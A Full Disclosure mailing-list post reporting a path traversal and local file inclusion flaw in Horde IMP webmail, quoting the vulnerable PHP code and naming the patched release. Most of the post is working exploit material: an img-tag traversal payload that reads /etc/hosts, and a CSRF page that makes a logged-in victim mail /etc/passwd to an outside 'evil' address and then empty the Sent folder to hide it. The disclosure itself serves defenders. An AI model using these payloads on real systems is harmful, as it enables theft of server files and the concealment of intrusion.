Full Disclosure mailing list archives

[fulldis] CVE-2026-58451 - Horde Groupware IMP path traversal vuln


From: ㅤevan via Fulldisclosure <fulldisclosure () seclists org>
Date: Fri, 3 Jul 2026 03:04:19 +1000

this is my first time sending to a mailing list so ive chosen
something easy. here goes:

Summary: Horde Groupware’s IMP Webmail solution contains a path
traversal/local file inclusion vulnerability which could be exploited
to escalate privileges or bypass authentication (through CSRF if
unauthenticated).

the vulnerability is in here:

} elseif (strcasecmp($node->tagName, 'IMG') === 0) {
                /* Check for smileys. They live in the JS directory, under
                 * the base ckeditor directory, so search for that and replace
                 * with the filesystem information if found (Request
                 * #13051). Need to ignore other image links that may have
                 * been explicitly added by the user. */
                $js_path = strval(Horde::url($registry->get('jsuri',
'horde'), true));
                if (stripos($src, $js_path . '/ckeditor') === 0) {
                    $file = str_replace(
                        $js_path,
                        $registry->get('jsfs', 'horde'),
                        $src
                    );

                    if (is_readable($file)) {
                        $data_part = new Horde_Mime_Part();
                        $data_part->setContents(file_get_contents($file));
                      ...

as seen, we control $file, which is just the src in <img src="">. to
get past the checks to hit our file_get_contents sink, we can just
satisfy the stripos check. our (elementary) exploit is thus:
--
<img src="https://webmail.foo.com/js/ckeditor/../../../../../../etc/hosts";>
--
this is likely very chainable with any other existing primitive to
achieve rce on horde IMP. for example, heres an easy csrf chain:

--
<!DOCTYPE html>
<html>

<body>
    <h1>yo</h1>
    <script>
        var p1 = new FormData();
        p1.append('to', 'john () evil gov');
        // land in spam
        p1.append('subject', 'hai');
        p1.append('html', '1');
        p1.append('message',
            '<html><body>bye<img
src="http://targ/horde/js/ckeditor/../../../../etc/passwd";></body></html>');

        p1.append('identity', '0');
        p1.append('priority', 'normal');
        p1.append('request_read_receipt', '0');
        p1.append('save_sent_mail', '1');
        fetch('http://targ/horde/services/ajax.php/imp/sendMessage&apos;, {
                method: 'POST',
                body: p1,
                credentials: 'include',
                mode: 'no-cors'
            })
            .then(() => {
                console.log("* bye");
                setTimeout(() => {
                    var p2 = new FormData();
                    p2.append('mbox', 'U0VOVA'); // b64 SENT
                    // delete

fetch('http://targ/horde/services/ajax.php/imp/emptyMailbox&apos;, {
                        method: 'POST',
                        body: p2,
                        credentials: 'include',
                        mode: 'no-cors'
                    });
                }, 2000);
            });
    </script>
</body>

</html>
--

PATCH:
update to horde imp 7.0.1 for the patch.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread: